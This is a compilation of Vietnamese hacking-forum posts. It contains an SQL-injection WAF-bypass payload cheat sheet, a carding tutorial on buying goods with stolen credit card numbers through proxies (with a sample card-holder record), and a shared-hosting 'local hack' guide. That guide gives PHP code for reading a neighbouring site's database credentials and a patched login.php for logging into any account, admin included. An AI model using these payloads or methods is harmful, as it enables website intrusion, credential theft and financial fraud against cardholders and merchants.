Bypass Sql Injection

Union Select Bypassing::

union(select(0),version(),(0),(0),(0),(0),( 0),(0),(0)) 
/*!50000union*/+/*!50000select*/ 
UNIunionON+SELselectECT 
+union+distinct+select+ 
+union+distinctROW+select+ 
union+/*!select*/+1,2,3 
union/**/select/**/1,2,3 
uni%20union%20/*!select*/%20
/**//*!union*//**//*!select*//**/
union%23aa%0Aselect
/**/union/*!50000select*/
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
id=1+’UnI”On’+'SeL”ECT’ <-MySQL only
id=1+'UnI'||'on'+SeLeCT' <-MSSQL only

after id no. like id=1 +/*!and*/+1=0

+div+0
Having+1=0
+AND+1=0
+/*!and*/+1=0
and(1)=(0)

False The Url::

=-id=-1 union all select
id=null union all select
id=1+and+false+union+all+select
id=9999 union all select

Order Bypassing do like this

/*!table_name*/
+from /*!information_schema*/./*!tables*/ where table_schema=database()
unhex(hex(Concat(Column_Name,0x3e ,Table_schema,0x3e,table_Name)))
/*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%2011 5,%2037)

used with order::

convert()using ascii)
unhex(hex())

[UPDATE] Một số vấn đề và hướng giải quyết

ORDER BY
- Khi order by ko hoạt động

Code:
site.com/news.php?id=9 order by 10000000000-- [No Error]
Cách giải quyết: Thêm ' vào sau tham số ID và thêm + vào cuối link

Code:
site.com/news.php?id=9' order by 10000000--+[Error]

UNION SELECT

- Khi ko thấy số column bị lỗi hiện ra

Code:
site.com/news.php?id=9 union select 1,2,3,4,5--
Cách giải quyết: Thay tham số bằng null

Code:
ite.com/news.php?id=null union select 1,2,3,4,5--
-Khi xuất hiện lỗi "The used SELECT statements have a different number of columns"
Cách giải quyết: thêm vào sau tham số id

Code:
ite.com/news.php?id=18+and+1=0+union select+1,2,3,4,5

Gặp lỗi khi extract tables
- Ko lấy đc table

Code:
site.com/news.php?id=9 union select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=database()--
Cách giải quyết: Thêm unhex(hex( trước group_concat

Code:
site.com/news.php?id=9 union select 1,2,unhex(hex(group_concat(table_name))),4,5 from information_schema.tables where table_schema=database()--
RaZoR Updated:

Bypass 406 - Not Acceptable

Như nhokpro888 hỏi, vì sao ngta ghi /*! Union */ thay vì ghi bình thường.
Nếu RZ ko lầm, /* .....*/ có nghĩa là mark as comment ( đánh chú thích ), ! có nghĩa là phủ định.
Phủ định của chú thích sẽ là query bình thường

Bypass WAF/Web application firewall

Khi vào đc đến đây:

Code:
http://www.site.com/index.php?id=-1 union select 1,2,3,4,5--
Gặp lỗi sau:

Code:
"404 forbidden you do not have permission to access to this webpage"
hoặc Not acceptable j đó

Hướng giải quyết:

Code:
http://www.site.com/index.php?id=-1+%2F%2A%21UNION%2A%2F+%2F%2A%21SELECT%2A%2F1%2C2%2C3%2C4%2C5--

Hiện tại SF chỉ viết đc đến đây, sẽ hoàn thiện dần dần các vấn đề về SQLi tại đây.
Có sai sót hay thiếu j thì RaZor sẽ bổ sung ở đây nhé...

[bài1]Tut ship cho newbie [ UPDATE]

Mình trình độ có nhưng ráng làm tuts này để hướng dẫn cho newbie cách ship đơn giản bằng ccn non info

các pro nào đã biết thì đừng chém em, em chỉ làm tuts cho newbie hiểu

nếu thiếu sót mong bổ sung,đừng chém

ai leech ghi rõ nguồn dùm mình

mình sẽ vừa hướng dẫn vừa giải thích các thuật ngữ cho các bạn hiểu


Phần 1:


Site thực hành: http://vistaprint.com// ( bán hàng áo thun mũ tự design,bút, thiệp)

Nguyện liệu CCN non Info ( chỉ có số cc và hạn dùng )

Sock: IP VN

B=S hoặc B # S đều được

ở đây mình giải thích chút

b=s tức là Bill address = Shipping Address ( Đia chỉ thanh toán và địa chỉ gửi hàng giống nhau )
* có thể điền toàn bộ là info và địa chỉ của bạn
b#s tức là Bill address # Shipping Address ( Đia chỉ thanh toán và địa chỉ gửi hàng khác nhau )
*Billing address : điển địa chỉ của cc
*Shipping address: điền địa chỉ của bạn

Ok bắt đầu

đầu tiên các bạn vào site http://vistaprint.com/

bằng Sock: IP VN

sau này nâng cao các bạn sẽ fake sock ( tính sau )

chọn 1 món hàng và bấ́m order now như hình dưới

[img]http://upanh.ws/?di=T2JL[/img]

sau đó các bạn đăng ký thông tin như hình


[img]http://upanh.ws/?di=I28Z[/img]

Bước 3: chọn Next


[img]http://upanh.ws/?di=BF4L[/img]


Bước 4: chọn Check out


[img]http://upanh.ws/?di=W7SM[/img]

Bước 5: điền thông tin Shipping address ( địa chỉ chuyển hàng)

Tức là địa chỉ nhà bạn


[img]http://upanh.ws/?di=KVIX[/img]


Phần 2:

Điền Billing Address ( Địa chỉ thanh toán )
Địa chỉ info của cc
Nhưng tuts này B=S được nên các bạn cũng có thể điền Info của mình

Sau đó chọn next


[img]http://upanh.ws/?di=TC78[/img]

Đến bước Check Out
Các bạn chỉ việc điền Number của CC mà hạn dủng\
chọn loại card
và bấm next

ở đây loại card các bạn để ý số đầu của CC
3 : là Amex
4 : là visa
5 : master

[img]http://upanh.ws/?di=VYHQ[/img]


Bước cuối cùng các bạn chọn accep


[img]http://upanh.ws/?di=I092[/img]

và chờ nó xác nhận
nếu ra như hình dưới là các bạn đá thành công
đối với site này chỉ cần ra như hình dưới là các bạn chỉ việc chờ hàng về

[img]http://upanh.ws/?di=5SID[/img]

iệc còn lại là chờ hàng về
thời gian hàng về tới VN là 21 ngày, hơi lâu nhưng là site dễ để các bạn tập ship

chúc các bạn thành công


một số bạn kêu site nát, và mình đã thử cho 1 bạn và kết quả là shipped nên mình xin đính chính là site vẫn ăn được nhưng do các bạn ko biết cách nên hàng ko về

nay minh hướng dẫn luôn các bạn bước cuối cùng

khi order ped các bạn sẽ nhận được 1 mail có có dạng




bạn bấm vào và đang nhập sẽ nhìn thấy thông báo ngày hàng về đến nhà

VD:

Order Status: Processing
Delivery Option: 21 Days
Arrives on or before: 01/01/2012 ( đây là ngay hàng về ngay 01-01-2012 ) - ngày-tháng-năm

đến ngày 01 các bạn chưa nhận được hàng

hãy gữi 1 email đến địa chỉ:



yêu cầu họ gửi hàng

VD gửi mail với nội dung



sau đó chờ mail phản hồi về shipped

Khi có mail về bạn vào check lại trong site sẽ như bên dưới

[img]http://upanh.ws/?di=STU9[/img]

và chờ từ 8-14 ngày hàng sẽ về

hết.

các pro nào ko tin thì đừng cho chém,mình đã thử và được nên post lên

ko tin thì ko cần thanks và mời đi ra

đây là tut cho nb

Hàng về khá lâu tính ra phải 28-35 ngày hàng mới về

nguồn leech

Các bạn vẫn thường nghe những từ như " Shipper " , " Seller " , " Reseller " , " Buyer " nhưng trong khuôn khổ bài viết về ship ngày hôm nay thì mình xin giải thích rõ hơn về từ "Shipper " .

Ship là một hành động vận chuyển hàng hóa, Shipper là người khởi động việc này hoặc làm việc này bắt đầu.
Người bình thường cũng có thể gọi là Shipper khi họ vào một Shop Online (Cửa hàng trên mạng) và đặt mua một món đồ gì đó. Nhưng Shipper trong Thế giới ngầm (UG) này là một người mua hàng cho mình nhưng thanh toán bằng tiền của người khác. Đó chính là sử dụng CC tức Credit Card (Thẻ tín dụng) của người khác để mua hàng. CC cũng chính là nồi cơm của tất cả các dân UG, thiếu nó thì Thế giới UG sẽ không tồn tại.

Và để bước chân vào việc ship hàng thì các bạn phải hiểu 1 số thuật ngữ trong việc ship hàng do các shiper đặt ra . mình không đề cập đến việc đọc CC nữa nhé ... Vi khi muốn ship thì ai cũng phải biết cái này

I . Thuật Ngữ Shipper

Drop : Thuật ngữ này được nhắc tới khá nhiều trong các tut ship , hay mọi người vẫn thường nói với nhau . Drop là gì ??? Thưa các bạn drop chính là 1 người có trách nhiệm nhận hàng cho chúng ta ở các nước US , Canada , Inter ... Có thể ở đây là 1 người bạn thân nào đó , hoặc là 1 anh bạn tây nào đó .

Bin : bin là 5 con số đầu tiên của 1 CCnumber . thường thì các bin này sẽ cho ta biết Creatcard này thuộc bank gì !

Ví dụ : Tôi có 1 số CCnumber của 1 con CC như sau :

Quote:
4828572353233026
Tôi lấy 5 số đầu tiên là :

Quote:
48285
. Sau đó tôi check cái bin này thì sẽ ra bank .

Quote:
WACHOVIA BANK, N.A. DEBIT CLASSIC
Bin = Ship ( Billing Information = Shipping Information ) : ở đây có nghĩa là dùng chính địa chỉ người nhận hàng làm địa chỉ thanh toán .

Ví Dụ : Tôi có 1 con CC như sau :

Quote:
Heather | burnette | 385 e.beal st. | Highland Springs | Virginia | 23075 | 8043221052 | US | 51515800402xxxxx | 01 | 2011 | 573
ở đây địa chỉ thanh toán đúng phải là :

Quote:
| 385 e.beal st. | Highland Springs | Virginia | 23075 |
Nhưng chúng ta sẽ fake địa chỉ này bằng chính địa chỉ người nhận . trong khi đó vẫn giữ nguyên tên và ccnumber vẫn là của con CC

Phương pháp này thì tùy 1 số Shop mới làm được chứ không phải 100% shop nào cũng làm được đâu nhé

Bin # Ship ( Billing Information # Shipping Information ) : Quá đơn giản và dễ hiểu rồi ... cái này thì mình ship như bình thường thôi . Điền illing Information ( của cc ) và Shipping Information ( của drop ) .

Sock = state : Khi đi ship hàng thì việc đầu tiên của chung ta là fake sock đúng không ? Sock = state có nghĩa là bạn phải fake IP thành state của con CC

Ví Dụ : ở con CC

Quote:
Heather | burnette | 385 e.beal st. | Highland Springs | Virginia | 23075 | 8043221052 | US | 51515800402xxxxx | 01 | 2011 | 573
Thì State của nó là :

Quote:
Virginia
Thì Các bạn phải fake sock state Virginia thôi

Sock US : đơn giản quá rồi miễn là sock us thôi . chẳng có gì rằng buộc cả

II . Kinh Nghiệm Ship Hàng

- Việc ship hàng có thành công hay không thành công dựa vào rất nhiều yếu tố gây nên . nhưng tôi xin đưa ra 1 số kinh nghiệm để giảm thiểu việc ship không thành công .

thứ 1 : Bạn phải đảm bảo rằng CC của bạn live và đủ tiền với món đồ bạn định ship . nếu bạn nào có thể check blance trưóc thì càng tốt . 1 số bạn thì dựa vào địa chỉ nhà ở của con cc mà đoán trước ... cũng có phần phải thôi . Nôm na ra thì nhà ở Phố lớn , phố to phải có nhiều tiền hơn mấy đứa nhà ở ổ chuột rồi

Thứ 2 : Bank chia CC ra rất nhiều loại . như debit card , bussines ... tùy vào từng loại mà các bạn sử dụng . 1 con CC thuộc loại thẻ ghi nợ thì cũng có thể ship món đồ 1000$ , 2000$ nhưng cũng phải xem bank nó có giới hạn ở mức độ nào ( để biết thì các bạn phải test đi test lại nhiều lần và tùy với shop mà sử dụng loại gì ) . Hay các bạn sử dụng 1 con cc thuộc dạng trả trước ... trong CC có 100$ mà các bạn đòi ship tới 300$ , 500$ thì thành công sao được . Đó cũng là nguyên nhân tôi đã nói ở kinh nghiệm thứ 1 . Hay bank có chịu changer tiền ngay hay không hay là nó hold vài ngày rồi mới changer ... ( những cái này thì đều do bạn test hoặc học hỏi kinh nghiệm ở các bro đi trước mà thôi )


Thứ 3 : Sock của bạn . Tùy vào từng shop mà chúng ta phải rút ra kinh nghiệm rằng shop này có thể dùng sock us được hay không ? Hay phải sử dụng Sock = state CC ! để có thể biết được điều này thì đối với shop mới các bạn phải test , hoặc ở 1 số tut khi mọi người đã post thì các bạn nên làm theo cách của chủ tut post k0 nên biến tấu nếu k0 hiểu rõ . Và ở 1 số shop thì nó còn kiểm tra xem sock có Bị blacklist hay không

Thứ 4 : Mình muốn nhắc tới tâm lý ship hàng , 1 số shop nó tính Trung bình thời gian 1 người có thể ship thành công 1 món đồ ( time out ) . Để tránh 1 số trường hợp các bác shiper nhà ta cầm cc , sock vào đâm đầu check out ... Chúng ta hãy mang 1 tâm lý là người chủ thẻ đi mua đồ chứ đừng có hầm hầm vào hãm hiếp ... ít nhất khi vào 1 shop cũng phải vào xem món này món nọ chứ có mấy ai vừa vào chả xem cái gì tự nhiên mua luôn đâu ? ( 1 số bro vẫn làm vậy nhưng không biết là có thủ thuật gì hay là do paygate của shop nó không kĩ tính và mình nói ở khía cạnh mua online nhé không lại có bro nào vặn vẹo bảo mua ngoài đời vẫn thế )

LenoPark-DF
__________________


B1- VÀO GOOGLE.COM TÌM DORK: CLOTHINGS, HANDBAG, STORE WORLDWIDE
Công thức : Mã:
Tên món hàng + Store or shop +worldwide
*HOẶC CÓ THỂ TÌM NHỮNG THỨ LIÊN QUAN. VÍ DỤ NHƯ TÌM ZIPPO ĐỪNG TÌM ZIPPO SHOP MÀ MÌNH SẼ TÌM MẤY SITE BÁN QUÂN PHỤC, ĐỒ QUÂN ĐỘI, SHOP BÀN ĐỒ ĐI PICNIC, SHOP DAO KÉO ĐỒ LÀM BẾP, CHỨ SHOP BAO CAO SU KHÔNG CÓ ZIPPO ĐÂU NHÉ


B2- KHI ĐÃ HIỆN CÁC KẾT QUẢ TÌM KIẾM VIỆC TIẾP THEO KÉO XUỐNG CUỐI TÌM GATE THANH TOÁN THEO KINH NGHIỆM CỦA MÌNH:

- Gate Yahoo check AVS cái này khó ped mình ped dc mỗi 1 lần.
*Thích hợp chơi B#S
- Gate mcafeesecure cái này live đủ $ là qua không check AVS
*Thích hợp chơi B#S B=S



- Gate Authorize.net gate này Check AVS live + đủ BL là qua.



*Thích hợp chơi B#S
- Sega pay gate chủ yếu của mấy site UK gate này có 2 loại:
*Loại 1 không cần VBV sẽ như này



*Loại 2 cần VBV sẽ như này:



*Thích hợp chơi B#S B=S
B3: LỰA CHỌN SHIPPING.
ĐỐI VỚI SITE US THEO MÌNH NÊN CHỌN USPS TAX NHẸ. GỬI HÀNG CÀNG CHẬM CÀNG ÍT MẤT TAX
SITE UK = ROYAL MAIL.
--------------------------------
BƯỚC CUỐI CÙNG THÌ CÁC BÁC KẾT HỢP LÀM SAO. FIND DC SITE --> QUA DC GATE --> SHIPPED DC --> FREE TAX HOẶC GIẢM THIỂU TAX
CHÚC CÁC BÁC THÀNH CÔNG

Các lệnh cơ bản trong linux cho các bạn mới bắt đầu học linux

Thím nào pro về linux thì local ngon :D
Lệnh liên quan đến hệ thống

* exit: thoát khỏi cửa sổ dòng lệnh.
* logout: tương tự exit.
* reboot: khởi động lại hệ thống.
* halt: tắt máy.
* startx: khởi động chế độ xwindows từ cửa sổ terminal.
* mount: gắn hệ thống tập tin từ một thiết bị lưu trữ vào cây thư mục chính.
* unmount: ngược với lệnh mount.

Lệnh thao tác trên tập tin

* ls: lấy danh sách tất cả các file và thư mục trong thư mục hiện hành.
* pwd: xuất đường dẫn của thư mục làm việc.
* cd: thay đổi thư mục làm việc đến một thư mục mới.
* mkdir: tạo thư mục mới.
* rmdir: xoá thư mục rỗng.
* cp: copy một hay nhiều tập tin đến thư mục mới.
* mv: đổi tên hay di chuyển tập tin, thư mục.
* rm: xóa tập tin.
* wc: đếm số dòng, số kí tự... trong tập tin.
* touch: tạo một tập tin.
* cat: xem nội dung tập tin.
* vi: khởi động trình soạn thảo văn bản vi.
* df: kiểm tra dung lượng đĩa.
* du: xem dung lượng đĩa đã dùng cho một số tập tin nhất định

Lệnh khi làm việc trên terminal

* clear: xoá trắng cửa sổ dòng lệnh.
* date: xem ngày, giờ hệ thống.
* cal: xem lịch hệ thống.

Lệnh quản lí hệ thống

* rpm: kiểm tra gói đã cài đặt hay chưa, hoặc cài đặt một gói, hoặc sử dụng để gỡ bỏ một gói.
* ps: kiểm tra hệ thống tiến trình đang chạy.
* kill: dừng tiến trình khi tiến trình bị treo. Chỉ có người dùng super-user mới có thể dừng tất cả các tiến trình còn người dùng bình thường chỉ có thể dừng tiến trình mà mình tạo ra.
* top: hiển thị sự hoạt động của các tiến trình, đặc biệt là thông tin về tài nguyên hệ thống và việc sử dụng các tài nguyên đó của từng tiến trình.
* pstree: hiển thị tất cả các tiến trình dưới dạng cây.
* sleep: cho hệ thống ngừng hoạt động trong một khoảng thời gian.
* useradd: tạo một người dùng mới.
* groupadd: tạo một nhóm người dùng mới.
* passwd: thay đổi password cho người dùng.
* userdel: xoá người dùng đã tạo.
* groupdel: xoá nhóm người dùng đã tạo.
* gpasswd: thay đổi password của một nhóm người dùng.
* su: cho phép đăng nhập với tư cách người dùng khác.
* groups: hiển thị nhóm của user hiện tại.
* who: cho biết ai đang đăng nhập hệ thống.
* w: tương tự như lệnh who.
* man: xem hướng dẫn về dòng lệnh như cú pháp, các tham số...

Để hiểu và sử dụng tốt các câu lệnh trên, các bạn nên sử dụng lệnh man với cú pháp: man ten_cau_lenh để có được những thông tin đầy đủ về chức năng cũng như cú pháp của câu lệnh. Chúc các bạn có những giây phút thú vị khi khám phá hệ điều hành này.

Khái Niệm về Hack local (for newbie)

Hack Local là gì ?
-------------------
Hiểu một cách nôm na là tấn công cục bộ. Cục bộ ở đây có nghĩa là trên cùng một máy chủ (server). Tấn công này được thực hiện như thế nào ?

Ví dụ ta cần tấn công site mục site1.com, nhưng sau khi phân tích tình hình thì thấy rằng việc tấn công trực tiếp site này là rất khó. Và cũng qua khảo sát ta biết được rằng trên server này có rất nhiều site khác. Ý tưởng : tấn công một site khác cùng server sau đó lấy site này làm bàn đạp tấn công site mục tiêu.

Có những loại hack local nào ? Tôi tạm thời chia làm 3 loại : Unix local, windows local, FTP local. Có lẽ rất nhiều bạn chỉ biết đến local hack trên Unix mà chưa biết đến 2 loại sau happy. Unix Local có nghĩa là máy chủ là Unix, tương tự đối với windows local, còn FTP local có nghĩa là local qua FTP.

Phần chung nhất của các loại trên là ở bước 1, bước tìm các site cùng server. Cái này có thuật ngữ chung là : Reverse IP. Ta có thể dùng tool sau để xác định các site cùng server :

http://www.domaintools.com/reverse-ip/ --> cái này mới thu phí rồi

http://www.seologs.com/ip-domains.html -> cái này có lợi thế là lưu cả tên miền Việt Nam, nhưng sô lượng ít hơn site trên

Sau khi làm xong bước trên, đến bước tìm site bị lỗi để dùng làm bàn đạp tấn công. Bước này thì ở các loại đã có sự phân hóa. Tôi sẽ trình bày riêng từng phần.

1. Unix local

Có lẽ bây giờ chỉ phổ biến site php-mysql trên Unix, nên tôi tập chung vào cái này. Cách tìm bug được tiến hành theo tư duy như sau :

- Nếu site đó sử sụng một loại mã nguồn đã được xác định, ví dụ dùng mã nguồn mở, thì đầu tiên là vào các site thông báo bug để kiểm tra xem bản code đang dùng có dính bug nào không. Có thể vào http://milw0rm.com/ hay http://www.securityfocus.com/ ... để tìm bug.

- Nếu ở bước trên không thành công hoặc code do họ tự phát triển thì cách duy nhất là phải tự ngồi mò xem. Lúc này dựa vào kinh nghiệm và khả năng của người hack là chính. Các lỗi hay được sử dụng và khá dễ để phát hiện : SQL injection, PHP file include, lỗi cài mặc định các ứng dụng như các bộ editor, lỗi không chứng thực phần upload file, upload file không filter, hoặc có filter + apache unknow extension,... rất nhiều lỗi có thể khai thác được. Tôi sẽ không đi vào chi tiết các lỗi này sử dụng và khai thác như thế nào.

Sau khi tìm ra lỗi, mục tiêu là phải upload được một con shell lên để có thể tiến hành tiếp bước sau. Việc upload được shell hay không phụ thuộc rất nhiều vào việc admin site đó CHMOD có tốt không. Các bạn có thể tham khảo bài : CHMOD là gì ? . Tôi giả sử là đã upload được shell rồi. Đến đây ta bắt đầu thử local sang site mục tiêu. Nếu Safe mode OFF và local dễ dàng thì không có gì đáng nói, site mục tiêu đã có thể xâm nhập. Nếu Safe mode ON và local gặp khó khăn, lúc này cần phải biết về các bug safe mode by pass. Các lỗi này tùy thuộc vào phiên bản của PHP và phụ thuộc vào các hàm có thể sử dụng có bị cấm hay không. Nếu không dùng PHP safe mode by pass ta có thể dùng LOAD DATA LOCAL INFINE, về cái này thì chị Yến đã có bài viết rồi.

Nếu tất cả các cách trên không được, ta xoay sang xem có khả năng get root - chiếm quyền kiểm soát server hay không, cái này tùy thuộc vào kernel của hệ điều hành và tùy thuộc vào phần mền cài trên máy chủ có dính bug overflow hay không ? ... Nói tóm lại là khi có shell rồi mỗi người có một cách tùy thuộc khả nẳng.

-->Cách fix ?

Để không bị dính các lỗi trên thì phải update phần mềm và config đúng (tôi sẽ nói chi tiết ở bài khác).

- Bật safe mode ON

- Trong php.ini Cấm các hàm nhạy cảm + các hàm có thể safe mode by pass (đòi hỏi admin phải cập nhật thông tin liên lục)

- Đối với virtual host thì tham số open_basedir là rất quan trọng, cần phải đặt tham số này đúng với thư mục web của từng site

- CHMOD kỹ cẩn thận (CHMOD như thế nào thì phải đọc)

- Các form upload cần phải lọc file...

- Trong file my.conf thêm dòng set-variable=local-infile=0 để tránh lỗi LOAD DATA LOCAL INFINE

2. Windows local

Cách tìm site lỗi về cơ bản là giống phần trên, chỉ khác ở đặc tính ngôn ngữ lập trình, cần phải xem xét kỹ hơn ở khía cạnh này.

Để có thể local được có các khả năng sau : phân quyền bị không tốt (thường là dùng chung group, group phân quyền không cẩn thận),server chưa cấm command execute. Tất cả các shell chạy trên windows đều có một đặc tính là sử dụng FSO (File System Object) - nếu cái này làm cẩn thận mà move cmd.exe đi thì không có cách gì chạy được cmd. Ở đây là còn chưa nói đến chương trình diệt virus rất nhạy cảm với FSO, nên rất dễ bị phát hiện.

-->Cách khắc phục ?

Phân quyền tốt : tốt nhất là nên dùng windows 2003 server, mỗi một site chạy một pool là tốt nhất, nhưng như thế tốn tài nguyên hơn. Account chạy web của mỗi site là riêng biệt và account chạy ASP.NET khác account chạy asp, php,... Việc set permission là cựu kỳ quan trọng, để làm tốt việc này, cần phải đọc thêm tài liệu và làm tốt các security check list của Microsoft. Lưu ý là không dùng Default pool để chạy. Thường là các server riêng rất hay gặp lỗi này vì admin những server này chỉ cần cài cho chạy được là xong nhưng ngược lại server riêng thường chỉ chạy 1 vài site. Cái nguy hiểm chính là ở chỗ này, nếu mà server riêng bị tấn công khả năng mất quyền kiểm soát và mất mát dữ liệu nhiều là rất cao.

3. FTP local

Cái này nghe có vẻ lạ nhưng cách khai thác lại cực kỳ đơn giản, tôi lấy chính site của tôi làm VD. Vì lỗi này tôi đã thông báo và chỉ cho admin cách fix. (mới fix thôi nhé, không biết đã hết chưa, không khéo chỉ fix mỗi acc của tôi, hôm sau lỗ source là toi happy)

Trên hình bạn đã nhìn thấy rồi đó, cái FTP trên là tôi login vào acc FTP của tôi, nhưng tôi có thể vào tất cả các FTP khác cùng server.

Vậy lỗi ở đâu ? Lỗi có thể do 2 khả năng :

- Tham số Fix Home dir (ko nhớ rõ) không được set

- Tất cả các user FTP chung group và group này có quyền đối với tất cả các thư mục của các acc thành phần.
----------------------------
Mot cach don gian nhat.
1, Tim mot muc tieu
2, Len whois check xem lang gieng of no
3, Check bug of no va cua lang gieng of no(se ton nhiu thoi gian va nho fai du kien tri)
4, Kiem tra va loi dung bug do up shell( thuong la con r57-shell php)
5, Finish no.
Mot cach khac de thu co ve nhanh hon.
1, Dang ky mot cai host php free
2, Up shell len(r57 or c99 or c100)
3, Chay shell -> lam dc j thi lam
4, Finish
------------------------
Bước 1. Xác định URL website cần hack.
Do đây là free hosting nên website luôn có dạng http://root/yoursite
Và giả sử forum phpBB nằm tại URL sau http://root/victim/phpBB_path/
Chú ý là phải tìm đúng URL Root chứ không phải redirect hay forward ..
Bước 2. Đăng kí một hosting cùng trên server đó.
Vì đây là free hosting nên nếu victim đăng kí được thì bạn cũng có thể đăng kí dễ dàng
Giả sử bạn đăng kí một hosting như sau http://root/mysite/
Bước 3 Xác định DB info của Victim
Điều này rất dơn giản khi bạn với victim đang cùng trên một Local
Thật vậy có thể là /home/user_root/public_html/mysite/ hay /home/user_root/httpdocs/mysite/ tuỳ thuộc Control Panel của Server là lọai gì (Cpanel, Plesk, Enxim..). Nhưng điều này không cần chú ý.
3.1 Bạn tạo một file để lấy DB info của victim như sau
## getdb.php begin
<?php
$fd = fopen ("../victim/phpBB_path/config.php", "r");
while (!feof ($fd)) {
$line = fgets($fd,4000);
print $line;
}
fclose ($fd);
?>
## getdb.php end
Bạn có thể thay $fd bằng đường dẫn tới bất kì file php mà bạn muốn xem mã nguồn của nó. Vì đối với các loại Portal hoặc forum khác có thể DB Info không chứa trong file config.php như của phpBB
3.2 Upload file getdb.php
Bạn chỉ việc upload lên hosting mà bạn vừa đăng kí http://root/mysite/getdb.php
3.3 Lấy DB info của victim
Chạy file getdb.php vừa rồi trên Browser của bạn. Bạn sẽ thấy một màn hình trắng (blank). Đừng lo, bạn hãy "View source" và bạn sẽ thấy được các thông tin như sau
## getdb.php's source begin
<?php
//
// phpBB 2.x auto-generated config file
// Do not change anything in this file!
//
$dbms = "mysql4";
$dbhost = "localhost";
$dbname = "DB name here";
$dbuser = "DB user here";
$dbpasswd = "DB passwd here";
$table_prefix = "phpbb_";
define('PHPBB_INSTALLED', true);
?>
## getdb.php's source end
Xong bước thứ 3
Bước 4. Kiểm tra mật khẩu mà bạn vừa lấy được.
Với nick Admin trong forum và tất cả những gì có thể liên quan như passwd e-mail, hosting, domain .. Vì có thể nạn nhân dùng 1 passwd cho tất cả những mật khẩu của mình cho đỡ quên. Đây là một trong những thói quen chết người
Nếu mà thành công thì dừng tại đây nếu không hãy sang bước thứ 5
Bước 5. Tạo một mirror phpBB forum.
5.1 Nghĩa là sao, bạn hãy upload một phpBB forum cùng phiên bản với victim vào hosting của bạn http://root/mysite/
Và đừng Install forum này nếu bạn muốn hack nó.
5.2 Config forum vừa upload
Bạn hãy config cho forum của bạn thực sự là một mirror của victim's forum.
Điều đó có nghĩa là bạn phải link DB đến DB của victim, điều đó thật dễ dàng khi bạn đã có được DB info của victim trong tay.
5.2.1 Tạo file config.php
Đó là toàn bộ những gì bạn vừa "view source" được
## config.php source begin
<?php
//
// phpBB 2.x auto-generated config file
// Do not change anything in this file!
//
$dbms = "mysql4";
$dbhost = "localhost";
$dbname = "DB name here";
$dbuser = "DB user here";
$dbpasswd = "DB passwd here";
$table_prefix = "phpbb_";
define('PHPBB_INSTALLED', true);
?>
## config.php source end
5.2.2 Upload config.php
Bạn upload đè lên file config.php trong cái forum mới toanh mà bạn vừa upload.
http://root/mysite/config.php
5.2.3 Thử lại
Bạn thử gõ http://root/mysite/ xem, nếu mà forum của bạn có các thông số y hệt như của http://root/victim/phpBB_path tức là bạn đã thành công bước này
Bước 6. Sửa mã nguồn Mirror Site
Mục đích bước này là bạn sẽ sửa mã nguồn forum của bạn đề bạn có thể Login vào được Admin panel của nó. Nếu bạn học PHP thì việc này khá dễ dàng.
Tôi xin nêu ra 1 phương pháp, đó là cách crack cổ điển.
6.1 Crack cổ điển
6.1.1
Đó là khi bạn muốn crack passwd 1 file exe, bạn có thể deassebler nó ra thành file.asm bằng nhiều chương trình hiện nay
6.1.2
Tìm các lệnh nhảy có điều kiện (JP gì gì đó. Cái này có hàng đống mà). của đoạn code dòi mật khẩu
6.1.3
Sửa thành lệnh nhảy không điều kiên
6.1.4
Compile lại thành file exe và OK. Ta nhập bất cứ mật khẩu nào vào nó cũng chấp nhận
6.2 Sửa mã nguồn
Sửa ở file login.php và sẽ cho phép bạn Login dưới mọi nickname bằng 1 passwd chọn sẵn
6.2.1 Chọn mật khẩu chung cho toàn bộ các nick.
Thực sự các mật khẩu trong phpBB đã được mà hoá theo kiểu MD5, do đó có thể rất khó khăn để có thể giải mã nó. Nếu các bạn hiểu rõ về kiêu encode này thì các bạn có thể tự tìm cho mình mật khẩu thích hợp, nếu không các bạn có thể sử dụng mật khẩu đã được tôi giải mã là: "hainam@hainam.org"
Cái địa chỉ mail của tôi ấy mà, khi mật khẩu này được mã hoá theo MD5 nó sẽ là một mật khẩu như sau "692e2c95b693cf6fbec8ea5c40536b9e"
hainam@hainam.org => 692e2c95b693cf6fbec8ea5c40536b9e
6.2.2 Thiết lập mật khẩu chung cho toàn bộ các nick
Trước hết bạn mở file login.php ra tìm đoạn sau
## file login.php ..
define("IN_LOGIN", true);
define('IN_PHPBB', true);
$phpbb_root_path = './';
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);
## file login.php ..
Chèn thêm biến $hack = "692e2c95b693cf6fbec8ea5c40536b9e";
Tức là sửa đoanj mã đó thành
## file login.php ..
define("IN_LOGIN", true);
define('IN_PHPBB', true);
$phpbb_root_path = './';
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);
$hack = "692e2c95b693cf6fbec8ea5c40536b9e";
## file login.php ..
Tiếp đó tìm đoạn mã sau
## file login.php ..
else
{
if( md5($password) == $row['user_password'] && $row['user_active'] )
{
$autologin = ( isset($HTTP_POST_VARS['autologin']) ) ? TRUE : 0;
## file login.php ..
Sửa đoạn mã đó thành
## file login.php ..
else
{
if( md5($password) == $hack && $row['user_active'] )
{
$autologin = ( isset($HTTP_POST_VARS['autologin']) ) ? TRUE : 0;
## file login.php ..
Ghi lại file login.php
Bước 7.Login User với mật khẩu đã chọn
Bây giờ bạn có thể login vào diễn đàn qua website của bạn http://root/mysite/login.php với bất cứ nickname nào bằng mật khẩu mà bạn đã chọn. Ở đây là "hainam@hainam.org" kể cả là nick Admin, và vào được Admin Panel ..
Chú ý rằng ở website của bạn thì User chỉ có thể login với mật khẩu là hainam@hainam.org chứ không thể bằng bât kì mật khẩu khác kể cả đó là mật khẩu đúng
Tổng quát
I/Phương Pháp
-Đây là một ví dụ cho việc hack các website khi trong một local, không chỉ riêng đối với phpBB mà có thể áp dụng được cho nhiều Portal hay forum khác, tuy nhiên để có thể hack được từng loại bạn đều phải hiểu rất kĩ về nó và tránh lạm dụng quá đáng.
-Cách hack này tuy mất nhiều thời gian trong việc upload một mirror nhưng rất hiệu quả. Tuy nhiên tuyệt đối không nên sử dụng chúng lung tung và bừa bãi.
-Các hosting cho phép free, điều đó chứng tỏ họ rất tốt bụng, cũng chính vì vậy cũng không nên sử dụng phương pháp này khi KHÔNG THỰC SỰ cần thiết
II/Ví dụ.
